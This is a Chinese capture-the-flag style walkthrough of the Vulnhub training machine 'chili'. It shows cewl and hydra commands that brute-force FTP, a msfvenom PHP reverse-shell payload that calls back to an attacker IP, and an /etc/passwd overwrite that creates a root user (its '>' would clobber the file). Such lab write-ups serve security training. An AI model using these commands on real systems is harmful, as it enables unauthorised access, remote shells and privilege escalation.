Vulnhub篇chili

admin 2020年12月2日19:20:47评论73 views字数 779阅读2分35秒阅读模式

点击蓝字,关注我们

0x00靶机信息

靶机:chili

难度:简单

下载:https://www.vulnhub.com/entry/chili-1,558/

0x01信息收集

扫描当前网段,确定目标靶机IP

Vulnhub篇chili

只开放了80、21端口,直接访问,扫目录一梭子

Vulnhub篇chili

网页 目录空空如也,这种情况一般就要看页面源码

Vulnhub篇chili
Vulnhub篇chili

查看源码发现一些关键词

Vulnhub篇chili

直接爬取关键词生成字典,准备爆破FTP服务

Cewl http://192.168.12.128 > user.txt


Vulnhub篇chili

字典生成好了,直接开始爆破FTP

hydra -L /root/user.txt -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.12.128
Vulnhub篇chili

账号:chili

密码:a1b2c3d4

0x02漏洞利用

先登入FTP,成功登入FTP

Vulnhub篇chili

查看网站目录,看看文件和权限

Vulnhub篇chili

.nano文件存在高权限,直接上MSF的PHP马

Msf生成php马

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.12.130 LPORT=3388 -f raw > shell.php
Vulnhub篇chili

ftp上传到.nano设置777权限

Vulnhub篇chili

Msf开启监控,连接php马

Vulnhub篇chili

0x03 提权

上传提权脚本并给777权限

脚本:https://github.com/luke-goddard/enumy

Vulnhub篇chili

执行脚本

Vulnhub篇chili

可写passwd,构造test成高权用户

Vulnhub篇chili
/usr/bin/perl -le 'print crypt("test","test")'
Vulnhub篇chili
echo "test:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" > /etc/passwd
Vulnhub篇chili

拿到flag

Vulnhub篇chili

往期推荐:

Vulnhub篇Photographerr:1

Vulnhub篇presidential:1

本文始发于微信公众号(信安小屋):Vulnhub篇chili

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月2日19:20:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub篇chilihttp://cn-sec.com/archives/194919.html

发表评论

匿名网友 填写信息